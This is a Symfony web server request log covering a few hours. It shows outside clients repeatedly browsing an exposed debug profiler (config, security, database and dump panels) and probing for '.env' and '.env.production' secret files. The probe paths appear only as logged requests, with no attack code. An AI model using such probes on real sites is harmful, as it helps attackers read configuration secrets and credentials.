[2025-12-19 19:10:12] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3f708d","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/3f708d/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-19 19:10:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-19 19:10:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=swiftmailer","method":"GET"} []
[2025-12-19 19:10:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-19 19:18:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=logger","method":"GET"} []
[2025-12-19 19:18:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-19 19:22:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fde7a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2fde7a?panel=router","method":"GET"} []
[2025-12-19 19:22:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-19 19:25:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 19:25:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 19:32:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8967d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8967d9?panel=time","method":"GET"} []
[2025-12-19 19:32:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 19:39:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c","method":"GET"} []
[2025-12-19 19:39:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 19:39:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 19:43:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c7bb2b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c7bb2b?panel=logger","method":"GET"} []
[2025-12-19 19:43:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-19 19:53:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=twig","method":"GET"} []
[2025-12-19 19:53:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 19:54:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap_index.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap_index.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 20:01:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a42ca9?panel=dump","method":"GET"} []
[2025-12-19 20:01:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 20:04:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"417fde","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/417fde?panel=router","method":"GET"} []
[2025-12-19 20:04:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-19 20:04:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 20:04:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-19 20:09:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b5b8fb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b5b8fb","method":"GET"} []
[2025-12-19 20:09:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 20:20:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=twig","method":"GET"} []
[2025-12-19 20:20:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 20:27:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1812fa","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1812fa?panel=logger","method":"GET"} []
[2025-12-19 20:27:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-19 20:29:04] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 20:31:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e607d2","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/e607d2/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-19 20:31:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-19 20:31:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 20:33:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?group=1&panel=db","method":"GET"} []
[2025-12-19 20:33:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-19 20:34:50] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6c3cf6","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/6c3cf6/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-19 20:34:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-19 20:38:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 20:38:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5","method":"GET"} []
[2025-12-19 20:38:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 20:42:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=time","method":"GET"} []
[2025-12-19 20:42:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 21:07:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=logger","method":"GET"} []
[2025-12-19 21:07:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-19 21:15:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a8701","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2a8701?panel=router","method":"GET"} []
[2025-12-19 21:15:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-19 21:16:54] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"174360","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/174360/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-19 21:16:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-19 21:19:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00a283","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/00a283?panel=time","method":"GET"} []
[2025-12-19 21:19:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 21:21:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=cache","method":"GET"} []
[2025-12-19 21:21:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 21:24:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 21:25:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=twig","method":"GET"} []
[2025-12-19 21:25:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 21:25:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 21:25:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-19 21:35:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=request","method":"GET"} []
[2025-12-19 21:35:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 21:46:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee","method":"GET"} []
[2025-12-19 21:46:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 21:49:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 21:54:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d669c6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d669c6?panel=dump","method":"GET"} []
[2025-12-19 21:54:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 22:02:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 22:07:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=dump","method":"GET"} []
[2025-12-19 22:07:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 22:09:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03665","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b03665?panel=twig","method":"GET"} []
[2025-12-19 22:09:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 22:09:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 22:09:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.production"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.production\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 22:11:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=security","method":"GET"} []
[2025-12-19 22:11:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 22:13:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap_index.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap_index.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 22:20:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 22:28:29] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 22:36:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=config","method":"GET"} []
[2025-12-19 22:36:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 22:36:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 22:36:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 22:45:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"14b2f9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/14b2f9?panel=exception","method":"GET"} []
[2025-12-19 22:45:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-19 22:47:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"628fdc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/628fdc?panel=security","method":"GET"} []
[2025-12-19 22:47:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 22:49:38] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3562aa","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3562aa/search/results?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
[2025-12-19 22:49:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
[2025-12-19 22:52:32] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"2882d9","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/2882d9/search/results?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
[2025-12-19 22:52:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
[2025-12-19 22:56:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d01650","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d01650?panel=router","method":"GET"} []
[2025-12-19 22:56:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-19 22:57:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cb60d4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/cb60d4?panel=config","method":"GET"} []
[2025-12-19 22:57:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 23:00:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759d74","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/759d74?panel=dump","method":"GET"} []
